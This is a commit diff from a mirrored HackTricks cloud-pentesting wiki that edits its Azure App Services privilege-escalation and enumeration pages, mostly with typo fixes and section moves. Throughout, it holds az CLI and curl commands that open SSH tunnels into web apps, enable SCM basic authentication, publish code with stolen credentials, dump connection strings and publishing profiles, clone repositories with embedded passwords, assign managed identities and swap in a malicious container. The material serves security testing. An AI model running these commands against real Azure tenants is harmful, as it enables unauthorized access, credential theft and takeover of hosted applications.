gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-08 22:00:47 -08:00
Code Issues Packages Projects Releases Wiki Activity

app services

Browse Source
This commit is contained in:
Carlos Polop
2025-01-04 04:38:52 +01:00
parent 18d1953edd
commit d65983432b
2 changed files with 20 additions and 37 deletions
Download Patch File Download Diff File Expand all files Collapse all files

35
src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
View File

@@ -26,7 +26,7 @@ az webapp ssh --name <name> --resource-group <res-group>
```bash
az webapp create-remote-connection --name <name> --resource-group <res-group>
## If successfull you will get a message such as:
## If successful you will get a message such as:
#Verifying if app is running....
#App is running. Trying to establish tunnel connection...
#Opening tunnel on port: 39895
@@ -41,7 +41,7 @@ ssh root@127.0.0.1 -p 39895
2. Login in the extension with the Azure account.
3. List all the App services inside the subscription.
4. Select the App service you want to debug, right click and select "Start Debugging".
5. If the app doesn0t have debugging enabled, the extnsion will try to enable it but your account needs the permission `Microsoft.Web/sites/config/write` to do so.
5. If the app doesn't have debugging enabled, the extension will try to enable it but your account needs the permission `Microsoft.Web/sites/config/write` to do so.
### Obtaining SCM Credentials & Enabling Basic Authentication
@@ -142,7 +142,7 @@ Remember that to access the SCM platform from the **web you need to access to `<
> Note that every user can configure it's own credentials calling the previous command, but if the user doesn't have enough permissions to access the SCM or FTP, the credentials won't work.
- If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
- If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`):
```bash
# Enable basic authentication for SCM
@@ -161,7 +161,7 @@ az rest --method PUT \
"properties": {
"allow": true
}
}
}'
```
### Publish code using SCM credentials
@@ -170,13 +170,13 @@ Just having valid SCM credentials it's possible to **publish code** to the App s
For this python example you can download the repo from https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, do any **changes** you wish and then **zip it running: `zip -r app.zip .`**.
Then you can **publish the code** with the following command:
Then you can **publish the code** in a web app with the following command:
```bash
curl -X POST "<SMC-URL>/api/publish?type=zip" --data-binary "@./app.zip" -u '<username>:<password>' -H "Content-Type: application/octet-stream"
```
### Microsoft.Web/sites/publish/Action | SCM credentials
### Webjobs: Microsoft.Web/sites/publish/Action | SCM credentials
The mentioned Azure permission allows to perform several interesting actions that can also be performed with the SCM credentials:
@@ -189,7 +189,7 @@ az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.az
# Using SCM username and password:
curl "<SCM-URL>/vfs/data/jobs/continuous/job_name/job_log.txt" \
--user '<username>:<password>>' -v
--user '<username>:<password>' -v
```
- Read **Webjobs** source code:
@@ -224,6 +224,14 @@ curl -X PUT \
--user '<username>:<password>'
```
### Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
These permissions allow to **assign a managed identity** to the App service, so if an App service was previously compromised this will allow the attacker to assign new managed identities to the App service and **escalate privileges** to them.
```bash
az webapp identity assign --name <app-name> --resource-group <res-group> --identities /subscriptions/<subcripttion-id>/resourceGroups/<res_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>
```
### Microsoft.Web/sites/config/list/action
This permission allows to list the **connection strings** and the **appsettings** of the App service which might contain sensitive information like database credentials.
@@ -233,15 +241,6 @@ az webapp config connection-string list --name <name> --resource-group <res-grou
az webapp config appsettings list --name <name> --resource-group <res-group>
```
### Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
These permissions allow to **assign a managed identity** to the App service, so if an App service was previously compromised this will allow the attacker to assign new managed identities to the App service and **escalate privileges** to them.
```bash
az webapp identity assign --name <app-name> --resource-group <res-group> --identities /subscriptions/<subcripttion-id>/resourceGroups/<res_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>
```
### Read Configured Third Party Credentials
Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one.
@@ -288,7 +287,7 @@ curl -H "Authorization: Bearer <token>" \
- `az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"`
- If the app is configured to use a **local git repository**, it's possible to **clone the repository** and **push changes** to it:
- Using the permission **`Microsoft.Web/sites/sourcecontrols/read`**: You can get the URL of the git repo with `az webapp deployment source show --name <app-name> --resource-group <res-group>`, but it's going to be the same as the the SCM URL of the app with the path `/<app-name>.git` (e.g. `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`).
- To get the SCM credential tou need the permission:
- To get the SCM credential you need the permission:
- **`Microsoft.Web/sites/publishxml/action`**: Then run `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>`.
- **`Microsoft.Web/sites/config/list/action`**: Then run `az webapp deployment list-publishing-credentials --name <name> --resource-group <res-group>`
@@ -300,7 +299,7 @@ curl -H "Authorization: Bearer <token>" \
### `Microsoft.Web/sites/config/Write`, `Microsoft.Web/sites/config/Read`, `Microsoft.Web/sites/config/list/Action`, `Microsoft.Web/sites/Read`
This is the set of permissions that allows to **modify the container used** by a webapp. An attacker could abuse it to make a webapp execute a maclious container.
This is the set of permissions that allows to **modify the container used** by a webapp. An attacker could abuse it to make a webapp execute a malicious container.
```bash
az webapp config container set \

22
src/pentesting-cloud/azure-security/az-services/az-app-services.md
View File

@@ -159,6 +159,9 @@ az webapp config storage-account list --name <name> --resource-group <res-group>
# Get configured container (if any) in the webapp, it could contain credentials
az webapp config container show --name <name> --resource-group <res-group>
# Get git URL to access the code
az webapp deployment source config-local-git --resource-group <res-group> -n <name>
# Get Webjobs
az webapp webjob continuous list --resource-group <res-group> --name <app-name>
az webapp webjob triggered list --resource-group <res-group> --name <app-name>
@@ -225,25 +228,6 @@ done
{{#endtab }}
{{#endtabs }}
#### Obtain credentials & get access to the webapp code
```bash
# Get connection strings that could contain credentials (with DBs for example)
az webapp config connection-string list --name <name> --resource-group <res-group>
## Check how to use the DBs connection strings in the SQL page
# Get credentials to access the code and DB credentials if configured.
az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>
# Get git URL to access the code
az webapp deployment source config-local-git --resource-group <res-group> -n <name>
# Access/Modify the code via git
git clone 'https://<username>:<password>@name.scm.azurewebsites.net/repo-name.git'
## In my case the username was: $nameofthewebapp and the password some random chars
## If you change the code and do a push, the app is automatically redeployed
```
{{#ref}}
../az-privilege-escalation/az-app-services-privesc.md